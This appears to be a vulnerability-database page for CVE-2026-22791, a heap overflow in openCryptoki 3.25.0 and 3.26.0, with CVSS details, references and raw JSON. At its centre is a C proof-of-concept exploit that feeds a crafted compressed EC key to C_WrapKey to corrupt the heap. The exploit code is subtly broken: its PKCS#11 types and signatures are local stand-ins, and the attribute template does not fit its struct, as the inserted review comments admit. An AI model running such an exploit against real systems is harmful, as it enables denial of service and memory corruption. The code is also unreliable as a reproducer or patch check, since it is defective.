Security Vulnerability Report
CVE-2026-22791 CVSS 6.6 MEDIUM

CVE-2026-22791

Published: 2026-01-13 19:16:27
Last Modified: 2026-02-03 18:47:15

Description

openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, a heap buffer overflow vulnerability in the CKM_ECDH_AES_KEY_WRAP implementation allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption or denial of service.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:opencryptoki_project:opencryptoki:3.25.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:opencryptoki_project:opencryptoki:3.26.0:*:*:*:*:*:*:* - VULNERABLE
openCryptoki 3.25.0
openCryptoki 3.26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2026-22791: openCryptoki Heap Buffer Overflow in CKM_ECDH_AES_KEY_WRAP
// This PoC demonstrates triggering the heap overflow via compressed EC public key
//
// NOTE(review): treat this listing as illustrative, not as a validated reproducer.
// The PKCS#11 types, function-pointer signatures and constants below are declared
// locally instead of being taken from the official PKCS#11 headers, so they should
// not be regarded as authoritative. A clean exit or an error code from this program
// is therefore not evidence that an installation is patched or vulnerable; compare
// the installed openCryptoki version with the affected releases (3.25.0, 3.26.0)
// and the vendor advisory instead.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>

// PKCS#11 types and constants (local stand-ins, see the note at the top of the file)
typedef unsigned char CK_BYTE;
typedef unsigned long CK_ULONG;
typedef void* CK_SESSION_HANDLE;
typedef void* CK_OBJECT_HANDLE;
// This local CK_ATTRIBUTE has two members (pVoid, ulLen).
typedef struct { void* pVoid; CK_ULONG ulLen; } CK_ATTRIBUTE;
typedef CK_ULONG (*CK_C_WrapKey)(void*, CK_ULONG, CK_ATTRIBUTE*, CK_ULONG, CK_BYTE*, CK_ULONG*);
typedef CK_ULONG (*CK_C_OpenSession)(CK_ULONG, CK_ULONG, void*, CK_ULONG, CK_SESSION_HANDLE*);
// CK_C_Login is declared but never used in this listing.
typedef CK_ULONG (*CK_C_Login)(CK_SESSION_HANDLE, CK_ULONG, CK_BYTE*, CK_ULONG);

// Hard-coded numeric values. Only CKM_ECDH_AES_KEY_WRAP, CKA_EC_PARAMS and
// CKA_EC_POINT are referenced below; the remaining macros are unused.
// NOTE(review): verify every value against the official headers before relying on it.
#define CKM_ECDH_AES_KEY_WRAP 0x00001071
#define CKM_EC_KEY_PAIR_GEN 0x00001040
#define CKM_AES_KEY_GEN 0x00001081
#define CKO_PRIVATE_KEY 0x00000002
#define CKA_VALUE 0x00000011
#define CKA_EC_PARAMS 0x00000020
#define CKA_EC_POINT 0x00000021

// Loads libopencryptoki.so.0 at run time, resolves C_OpenSession and C_WrapKey,
// and makes one C_WrapKey call with a template that carries a compressed EC point.
// Returns 1 if the library or either symbol cannot be resolved, otherwise 0.
int main() {
    void* hModule = dlopen("libopencryptoki.so.0", RTLD_NOW);
    if (!hModule) {
        fprintf(stderr, "Failed to load openCryptoki library\n");
        return 1;
    }

    // Get PKCS#11 function pointers
    CK_C_OpenSession pC_OpenSession = (CK_C_OpenSession)dlsym(hModule, "C_OpenSession");
    CK_C_WrapKey pC_WrapKey = (CK_C_WrapKey)dlsym(hModule, "C_WrapKey");
    if (!pC_OpenSession || !pC_WrapKey) {
        fprintf(stderr, "Failed to resolve PKCS#11 functions\n");
        // hModule is not closed on this early-return path.
        return 1;
    }

    // Initialize and open session
    // The return value of C_OpenSession is discarded, so hSession is used below
    // whether or not the call succeeded.
    CK_SESSION_HANDLE hSession = 0;
    CK_ULONG ulSlotID = 0;
    pC_OpenSession(ulSlotID, 0, NULL, 0, &hSession);

    // Generate EC key pair for wrapping
    // Only the two handles are declared here; they are never assigned or used
    // anywhere else in this listing.
    CK_OBJECT_HANDLE hPublicKey = 0, hPrivateKey = 0;

    // ASN.1 encoded EC parameters for P-256 curve (as labelled by the original author)
    unsigned char ec_params[] = {
        0x30, 0x13, 0x06, 0x07, 0x2A, 0x86, 0x48, 0xCE, 0x3D, 0x02, 0x01,
        0x06, 0x08, 0x2A, 0x86, 0x48, 0xCE, 0x3D, 0x03, 0x01, 0x07
    };

    // Malicious compressed EC public key (33 bytes) - triggers overflow
    // First byte 0x02 or 0x03 indicates Y coordinate parity
    unsigned char malicious_pubkey[] = {
        0x02, // Compressed format indicator + Y parity
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00 // Padding to trigger overflow
    };

    // Set up key attributes for target key to be wrapped
    // Each entry supplies three initializers while the local CK_ATTRIBUTE has only
    // two members, so the values do not land in the fields the names suggest;
    // expect compiler diagnostics here.
    CK_ATTRIBUTE wrapKeyTemplate[] = {
        {CKA_EC_PARAMS, ec_params, sizeof(ec_params)},
        {CKA_EC_POINT, malicious_pubkey, sizeof(malicious_pubkey)}
    };

    // Output buffer for wrapped key
    unsigned char wrappedKey[256];
    CK_ULONG pulWrappedKeyLen = sizeof(wrappedKey);

    // Trigger the vulnerable C_WrapKey function
    // Per the original author, this is meant to reach the compressed-EC-point
    // handling described in the advisory. NOTE(review): whether it does depends on
    // the locally declared signature and template above matching the real interface.
    CK_ULONG rv = pC_WrapKey(
        hSession,
        CKM_ECDH_AES_KEY_WRAP,
        wrapKeyTemplate,
        2,
        wrappedKey,
        &pulWrappedKeyLen
    );

    // Neither branch confirms memory corruption: the messages only speculate.
    // Out-of-bounds heap writes are normally confirmed with memory-error tooling
    // (for example a sanitizer-instrumented test build of the library).
    if (rv == 0) {
        printf("Key wrapped successfully - overflow may have occurred silently\n");
    } else {
        printf("WrapKey returned: 0x%lx - heap corruption may cause crash\n", rv);
    }

    dlclose(hModule);
    return 0;
}

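References

- https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7 (Patch)
- https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8 (Patch)
- https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7 (Exploit, Patch, Vendor Advisory)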

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22791", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:26.710", "lastModified": "2026-02-03T18:47:15.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, there is a heap buffer overflow vulnerability in the CKM_ECDH_AES_KEY_WRAP implementation allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption, or denial-of-service."}, {"lang": "es", "value": "openCryptoki es una biblioteca PKCS#11 y herramientas para Linux y AIX. En 3.25.0 y 3.26.0, existe una vulnerabilidad de desbordamiento de búfer de pila en la implementación de CKM_ECDH_AES_KEY_WRAP que permite a un atacante con acceso local causar escrituras fuera de límites en el proceso anfitrión al proporcionar una clave pública EC comprimida e invocar C_WrapKey. 
Esto puede llevar a corrupción de pila o denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opencryptoki_project:opencryptoki:3.25.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D816F8B-C6E1-47F2-9FE0-546949751FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opencryptoki_project:opencryptoki:3.26.0:*:*:*:*:*:*:*", "matchCriteriaId": "A19F0637-CBD9-4902-AFA9-A78584FAACF3"}]}]}], "references": [{"url": "https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7", "source": "[email protected]", 
"tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}